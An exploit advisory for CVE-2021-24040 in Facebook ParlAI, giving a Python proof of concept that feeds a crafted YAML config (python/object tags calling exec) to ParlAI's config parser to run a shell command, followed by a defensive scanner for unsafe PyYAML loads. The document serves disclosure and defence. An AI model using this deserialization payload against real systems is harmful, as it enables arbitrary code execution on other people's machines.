# Exploit Title: Facebook ParlAI 1.0.0 - Deserialization of Untrusted Data in parlai
# Date: 2021-09-11
# Exploit Author: Abhiram V
# Vendor Homepage: https://parl.ai/
# Software Link: https://github.com/facebookresearch/ParlAI
# Version: < 1.1.0
# Tested on: Linux
# CVE: CVE-2021-24040
# References :
# https://github.com/facebookresearch/ParlAI/security/advisories/GHSA-m87f-9fvv-2mgg
# | https://anon-artist.github.io/blogs/blog3.html |

############################################################################

Introduction

ParlAI (pronounced “par-lay”) is a free, open-source Python framework for
sharing, training and evaluating AI models on a variety of openly available
dialogue datasets.

############################################################################

Vulnerability details

############################################################################

Description

ParlAI was vulnerable to a YAML deserialization attack caused by unsafe
loading, which leads to arbitrary code execution.

Proof of Concept

Create the following PoC file (exploit.py)

import os
#os.system('pip3 install parlai')
from parlai.chat_service.utils import config

# YAML document whose Python-specific tags make the loader call exec()
# on the "listitems" string while constructing the object.
exploit = """!!python/object/new:type
  args: ["z", !!python/tuple [], {"extend": !!python/name:exec }]
  listitems: "__import__('os').system('xcalc')"
"""

# Write the crafted configuration and pass it to ParlAI's config parser.
open('config.yml','w+').write(exploit)
config.parse_configuration_file('config.yml')

Execute the Python script, i.e. python3 exploit.py

Impact

Code Execution

############################################################################
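
An added example, not part of the original advisory and not ParlAI's code: a standard-library audit that flags PyYAML load calls not pinned to a safe loader, the kind of "unsafe loading" the description names. The sample source and its function names are constructed, and treating `full_load`/`FullLoader` as unsafe is a policy assumption of this example.

```python
import ast

# Loaders limited to plain YAML types; anything else is treated as unsafe here.
SAFE_LOADERS = {"SafeLoader", "CSafeLoader", "BaseLoader", "CBaseLoader"}
RISKY_FUNCS = {"unsafe_load", "unsafe_load_all", "full_load", "full_load_all"}

def _last_name(node):
    """yaml.SafeLoader or SafeLoader -> 'SafeLoader'; other expressions -> None."""
    return getattr(node, "attr", None) or getattr(node, "id", None)

def find_unsafe_yaml_loads(source, alias="yaml"):
    """Return sorted (lineno, reason) for yaml load calls not pinned to a safe loader."""
    findings = []
    for node in ast.walk(ast.parse(source)):
        if not (isinstance(node, ast.Call) and isinstance(node.func, ast.Attribute)):
            continue
        base, func = node.func.value, node.func.attr
        if not (isinstance(base, ast.Name) and base.id == alias):
            continue
        if func in RISKY_FUNCS:
            findings.append((node.lineno, f"{func}() is not restricted to plain types"))
        elif func in ("load", "load_all"):
            # Loader is the second positional argument or the Loader= keyword.
            loader = node.args[1] if len(node.args) > 1 else None
            for kw in node.keywords:
                if kw.arg == "Loader":
                    loader = kw.value
            if loader is None:
                findings.append((node.lineno, f"{func}() without an explicit Loader"))
            elif _last_name(loader) not in SAFE_LOADERS:
                findings.append((node.lineno, f"{func}() with Loader={_last_name(loader)}"))
    return sorted(findings)

# Constructed sample source (not ParlAI's code); function names are hypothetical.
SAMPLE = '''\
import yaml
def load_chat_config(text):
    return yaml.load(text, Loader=yaml.FullLoader)
def load_legacy(text):
    return yaml.load(text)
def load_hardened(text):
    return yaml.safe_load(text)
def load_pinned(text):
    return yaml.load(text, Loader=yaml.SafeLoader)
'''

if __name__ == "__main__":
    for lineno, reason in find_unsafe_yaml_loads(SAMPLE):
        print(f"line {lineno}: {reason}")
```

The check only follows the module name given in `alias`, so code that imports the loader functions directly (`from yaml import load`) needs a separate pass.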